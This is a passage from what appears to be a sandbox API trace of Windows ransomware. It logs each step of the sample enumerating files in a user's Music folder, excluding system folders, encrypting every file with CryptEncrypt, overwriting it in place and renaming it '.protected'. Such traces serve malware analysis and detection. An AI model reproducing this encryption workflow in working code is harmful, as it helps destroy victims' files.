nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.285] CloseHandle (hObject=0xd8) returned 1 [0092.285] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav.protected") returned 98 [0092.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\7xbqxzq dcx.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\7xbqxzq dcx.wav.protected")) returned 1 [0092.285] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.285] lstrcmpiW (lpString1="93AMr4.wav", lpString2="Windows") returned -1 [0092.285] lstrcmpiW (lpString1="93AMr4.wav", lpString2="Program Files") returned -1 [0092.286] lstrcmpiW (lpString1="93AMr4.wav", lpString2="Program Files (x86)") returned -1 [0092.286] lstrcmpiW (lpString1="93AMr4.wav", lpString2="$Recycle.bin") returned 1 [0092.286] lstrcmpiW (lpString1="93AMr4.wav", lpString2="System Volume Information") returned -1 [0092.286] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav") returned 83 [0092.286] StrStrIW (lpFirst="93AMr4.wav", lpSrch=".protected") returned 0x0 [0092.286] lstrcmpW (lpString1="93AMr4.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.286] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.286] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\93amr4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav") returned 83 [0092.286] StrStrW (lpFirst="93AMr4.wav", lpSrch=".txt") returned 0x0 [0092.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav") returned 83 [0092.286] StrStrW (lpFirst="93AMr4.wav", lpSrch=".rar") returned 0x0 [0092.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav") returned 83 [0092.286] StrStrW (lpFirst="93AMr4.wav", lpSrch=".zip") returned 0x0 [0092.286] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x126f, lpOverlapped=0x0) returned 1 [0092.287] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffed91, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.287] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x126f, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x126f, lpOverlapped=0x0) returned 1 [0092.287] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.287] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.287] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.287] CloseHandle (hObject=0xd8) returned 1 [0092.287] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav.protected") returned 93 [0092.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\93amr4.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\93amr4.wav.protected")) returned 1 [0092.288] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.288] lstrcmpiW (lpString1="DWkMZqzFQZj.mp3", lpString2="Windows") returned -1 [0092.288] lstrcmpiW (lpString1="DWkMZqzFQZj.mp3", lpString2="Program Files") returned -1 [0092.288] lstrcmpiW (lpString1="DWkMZqzFQZj.mp3", lpString2="Program Files (x86)") returned -1 [0092.288] lstrcmpiW (lpString1="DWkMZqzFQZj.mp3", lpString2="$Recycle.bin") returned 1 [0092.288] lstrcmpiW (lpString1="DWkMZqzFQZj.mp3", lpString2="System Volume Information") returned -1 [0092.288] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3") returned 88 [0092.288] StrStrIW (lpFirst="DWkMZqzFQZj.mp3", lpSrch=".protected") returned 0x0 [0092.288] lstrcmpW (lpString1="DWkMZqzFQZj.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.288] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.288] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dwkmzqzfqzj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.288] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3") returned 88 [0092.288] StrStrW (lpFirst="DWkMZqzFQZj.mp3", lpSrch=".txt") returned 0x0 [0092.288] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3") returned 88 [0092.288] StrStrW (lpFirst="DWkMZqzFQZj.mp3", lpSrch=".rar") returned 0x0 [0092.288] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3") returned 88 [0092.288] StrStrW (lpFirst="DWkMZqzFQZj.mp3", lpSrch=".zip") returned 0x0 [0092.289] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.289] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.289] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.289] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.289] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.289] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.289] CloseHandle (hObject=0xd8) returned 1 [0092.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3.protected") returned 98 [0092.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dwkmzqzfqzj.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dwkmzqzfqzj.mp3.protected")) returned 1 [0092.290] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.290] lstrcmpiW (lpString1="DzM_NHkppokegVp5c4R", lpString2="Windows") returned -1 [0092.290] lstrcmpiW (lpString1="DzM_NHkppokegVp5c4R", lpString2="Program Files") returned -1 [0092.290] lstrcmpiW (lpString1="DzM_NHkppokegVp5c4R", lpString2="Program Files (x86)") returned -1 [0092.290] lstrcmpiW (lpString1="DzM_NHkppokegVp5c4R", lpString2="$Recycle.bin") returned 1 [0092.290] lstrcmpiW (lpString1="DzM_NHkppokegVp5c4R", lpString2="System Volume Information") returned -1 [0092.290] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R") returned 92 [0092.290] lstrcmpW (lpString1="DzM_NHkppokegVp5c4R", lpString2=".") returned 1 [0092.290] lstrcmpW (lpString1="DzM_NHkppokegVp5c4R", lpString2="..") returned 1 [0092.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\*") returned 94 [0092.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0092.291] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.291] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.291] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.291] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.291] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\.") returned 94 [0092.291] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.291] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.291] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.291] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.291] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.291] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.291] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\..") returned 95 [0092.291] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.291] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.291] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.291] lstrcmpiW (lpString1="4MQ5ObmQYNUIotx0Cq.mp3", lpString2="Windows") returned -1 [0092.291] lstrcmpiW (lpString1="4MQ5ObmQYNUIotx0Cq.mp3", lpString2="Program Files") returned -1 [0092.291] lstrcmpiW (lpString1="4MQ5ObmQYNUIotx0Cq.mp3", lpString2="Program Files (x86)") returned -1 [0092.291] lstrcmpiW (lpString1="4MQ5ObmQYNUIotx0Cq.mp3", lpString2="$Recycle.bin") returned 1 [0092.291] lstrcmpiW (lpString1="4MQ5ObmQYNUIotx0Cq.mp3", lpString2="System Volume Information") returned -1 [0092.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3") returned 115 [0092.291] StrStrIW (lpFirst="4MQ5ObmQYNUIotx0Cq.mp3", lpSrch=".protected") returned 0x0 [0092.291] lstrcmpW (lpString1="4MQ5ObmQYNUIotx0Cq.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.291] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.291] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\4mq5obmqynuiotx0cq.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3") returned 115 [0092.292] StrStrW (lpFirst="4MQ5ObmQYNUIotx0Cq.mp3", lpSrch=".txt") returned 0x0 [0092.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3") returned 115 [0092.292] StrStrW (lpFirst="4MQ5ObmQYNUIotx0Cq.mp3", lpSrch=".rar") returned 0x0 [0092.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3") returned 115 [0092.292] StrStrW (lpFirst="4MQ5ObmQYNUIotx0Cq.mp3", lpSrch=".zip") returned 0x0 [0092.292] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.292] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.293] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.293] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.293] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.293] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.293] CloseHandle (hObject=0x14c) returned 1 [0092.298] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3.protected") returned 125 [0092.298] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\4mq5obmqynuiotx0cq.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\4mq5obmqynuiotx0cq.mp3.protected")) returned 1 [0092.300] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.300] lstrcmpiW (lpString1="698coZeZh.wav", lpString2="Windows") returned -1 [0092.300] lstrcmpiW (lpString1="698coZeZh.wav", lpString2="Program Files") returned -1 [0092.300] lstrcmpiW (lpString1="698coZeZh.wav", lpString2="Program Files (x86)") returned -1 [0092.300] lstrcmpiW (lpString1="698coZeZh.wav", lpString2="$Recycle.bin") returned 1 [0092.300] lstrcmpiW (lpString1="698coZeZh.wav", lpString2="System Volume Information") returned -1 [0092.300] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav") returned 106 [0092.300] StrStrIW (lpFirst="698coZeZh.wav", lpSrch=".protected") returned 0x0 [0092.300] lstrcmpW (lpString1="698coZeZh.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.300] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.300] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\698cozezh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.301] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav") returned 106 [0092.301] StrStrW (lpFirst="698coZeZh.wav", lpSrch=".txt") returned 0x0 [0092.301] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav") returned 106 [0092.301] StrStrW (lpFirst="698coZeZh.wav", lpSrch=".rar") returned 0x0 [0092.301] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav") returned 106 [0092.301] StrStrW (lpFirst="698coZeZh.wav", lpSrch=".zip") returned 0x0 [0092.301] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.301] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.301] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.302] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.302] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.302] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.302] CloseHandle (hObject=0x14c) returned 1 [0092.302] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav.protected") returned 116 [0092.302] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\698cozezh.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\698cozezh.wav.protected")) returned 1 [0092.303] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.303] lstrcmpiW (lpString1="ATg-8CnAReIP.mp3", lpString2="Windows") returned -1 [0092.303] lstrcmpiW (lpString1="ATg-8CnAReIP.mp3", lpString2="Program Files") returned -1 [0092.303] lstrcmpiW (lpString1="ATg-8CnAReIP.mp3", lpString2="Program Files (x86)") returned -1 [0092.303] lstrcmpiW (lpString1="ATg-8CnAReIP.mp3", lpString2="$Recycle.bin") returned 1 [0092.303] lstrcmpiW (lpString1="ATg-8CnAReIP.mp3", lpString2="System Volume Information") returned -1 [0092.303] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3") returned 109 [0092.303] StrStrIW 